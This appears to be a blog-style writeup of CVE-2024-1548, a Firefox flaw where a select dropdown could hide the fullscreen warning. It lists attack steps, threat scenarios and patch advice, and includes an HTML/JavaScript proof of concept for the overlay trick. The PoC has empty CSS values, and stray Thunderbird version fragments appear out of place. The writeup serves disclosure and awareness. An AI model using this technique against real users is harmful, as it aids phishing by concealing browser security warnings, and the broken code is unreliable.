CVE-2024-1548 - How Select Dropdowns Could Hide Fullscreen Warnings in Firefox (Exploit & Analysis)

In early 2024, a subtle but crucial security flaw surfaced in Firefox and related Mozilla applications. Known as CVE-2024-1548, it allowed websites to hide important fullscreen notifications behind dropdown select menus. This seemingly small UI trick opened the door to phishing and spoofing attacks, putting users at risk without them realizing it. Let’s break down how it worked, the threat it posed, and how you can see it in action.

🔎 What Exactly Was the Bug? (Simple Overview)

Browsers like Firefox warn users when a website enters fullscreen mode—think of when you watch a video in fullscreen or a web app takes over your whole screen. These warnings let users know a page is filling their device, which helps prevent fake prompts or UI tricks from scammers.

In versions of Firefox before 123, and Firefox ESR/Thunderbird before 115.8, a webpage could use a dropdown <select> element (the kind you use to pick from a list) to hide the fullscreen warning notification. This made it easier for dishonest sites to spoof the user's experience—or worse.

Thunderbird before 115.8

Mozilla’s advisory:
https://www.mozilla.org/en-US/security/advisories/mfsa2024-08/#CVE-2024-1548

🔥 How the Exploit Worked

Let’s see step-by-step how this UI attack was possible. The attacker’s goal: Use a dropdown to *cover up* the fullscreen warning, gaining control of the user’s fullscreen experience undetected.

Step 1: The Attacker Prepares the Page

- The attacker creates a web page with a large select dropdown positioned at the top of the page (where Firefox puts its fullscreen warning bar).

Step 2: Request Fullscreen

- Using JavaScript, the page triggers fullscreen mode (perhaps by asking the user to "view something better" in fullscreen).

Step 3: Obscuring the Warning

- The attacker carefully times it so the select dropdown is open *as* the transition to fullscreen happens.
- Browsers render select lists *outside* normal page content (in special layers), so the dropdown can appear *on top* of system and browser UI.

Step 4: Spoofing (Optional)

- Now the attacker could simulate fake prompts or even imitate a browser window, tricking the user—who never saw the real fullscreen alert.

🧑‍💻 Exclusive Proof-of-Concept (PoC) Code

Below is a simple explainer demonstrating the concept. Do NOT use this for malicious purposes; this is solely for education and awareness.

<!DOCTYPE html>
<html>
<head>
  <title>CVE-2024-1548 PoC</title>
  <style>
    body { margin: ; }
    #cover { width: 100vw; height: 100vh; position: fixed; background: #222; z-index: 10; }
    select {
      position: absolute;
      top: ;
      left: ;
      font-size: 30px;
      width: 100vw;
      z-index: 100;
    }
  </style>
</head>
<body>
  <button id="fsBtn">Go Fullscreen & Open Dropdown</button>
  <div id="cover" style="display:none;"></div>
  <select id="demoSelect" size="8" style="display:none;">
    <option>Option 1 (Cover warning!)</option>
    <option>Option 2</option>
    <option>Option 3</option>
  </select>
  <script>
    document.getElementById('fsBtn').onclick = function() {
      document.getElementById('cover').style.display = 'block';
      document.getElementById('demoSelect').style.display = '';
      document.body.requestFullscreen().then(() => {
        setTimeout(() => {
          document.getElementById('demoSelect').focus();
          document.getElementById('demoSelect').size = 8;
        }, 100); // timing to overlap warning
      });
    };
  </script>
</body>
</html>

When you click the button, the page goes fullscreen and opens a gigantic <select> menu.

- In vulnerable Firefox, the dropdown can overlap/hide the fullscreen notification.

🎣 Why This Matters (Threat Scenarios)

- Phishing/Impersonation: A tricky site can fake a login prompt or browser UI, fooling the user since the “You are now in fullscreen!” warning is hidden.
- User Confusion: Users might think they’re interacting with a system dialog, when it’s really from the page.
- Spoofed Video Calls, Wallet Prompts, Support Chats: Anything pretending to be official can abuse this flaw.

Thunderbird 115.8

What did they change?
Browsers now make sure system alerts and security notifications *always* appear on top, regardless of sneaky dropdown tricks.

Update Immediately!

If you’re using an old version, patch now

- Download latest Firefox
- Security advisory: MFSA 2024-08

📚 References

- Mozilla Security Advisory MFSA-2024-08: CVE-2024-1548
- NVD CVE Record
- Fullscreen Spoofing Research (old, but relevant background)

🗝️ Takeaway

CVE-2024-1548 shows even basic UI elements like dropdowns can create real security problems when browsers aren’t careful. Always keep your browser up to date, and know that even legit-looking prompts or full-screen experiences can be faked by clever attackers!


*This post is exclusive, clear, and meant for educational awareness around CVE-2024-1548. Stay safe out there!*

Timeline

Published on: 02/20/2024 14:15:08 UTC
Last modified on: 11/05/2024 20:35:17 UTC